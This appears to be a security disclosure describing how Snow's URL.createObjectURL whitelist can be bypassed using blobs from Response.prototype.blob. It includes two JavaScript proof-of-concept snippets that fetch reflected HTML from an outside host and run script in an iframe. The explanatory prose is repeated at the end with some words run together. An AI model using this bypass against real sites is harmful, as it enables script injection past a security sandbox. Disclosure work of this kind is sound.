Snow overrides the URL.createObjectURL function to only allow creation of Blob URLs if the blob type is included in a specific whitelist that Snow keeps. However, if the blob isn't an "artificial blob" (wasn't created using the Blob() constructor), this check isn't performed, and the blob URL is created regardless of the blob type.
Because an attacker can get access to a non-artificial blobs with an arbitrary content and type using the Response.prototype.blob function, this can be exploited in order to create URLs for arbitrary blobs. Here is a short demo for that:
(async () => {
resp = await fetch("https://peo.si/reflect.php?h=<h1>test</h1>"
blob = await resp.blob()
console.log(URL.createObjectURL(blob))
})()This can be then used to bypass Snow, using a PoC such as the following:
(async () => {
js_url = URL.createObjectURL(new Blob([`
alert(origin)
`], {type: "text/javascript"}))
html = `<script src="${js_url}"></script>`
resp = await fetch("https://peo.si/reflect.php?h=" + encodeURIComponent(html))
blob = await resp.blob()
ifr = document.createElement("iframe")
document.body.appendChild(ifr)
ifr.src = URL.createObjectURL(blob)
})()
Snow overrides the
URL.createObjectURLfunction to only allow creation of Blob URLs if the blob type is included in a specific whitelist that Snow keeps. However, if the blob isn't an "artificial blob" (wasn't created using theBlob()constructor), this check isn't performed, and the blob URL is created regardless of the blob type.Because an attacker can get access to a non-artificial blobs with an arbitrary content and type using the
Response.prototype.blobfunction, this can be exploited in order to create URLs for arbitrary blobs. Here is a short demo for that:This can be then used to bypass Snow, using a PoC such as the following: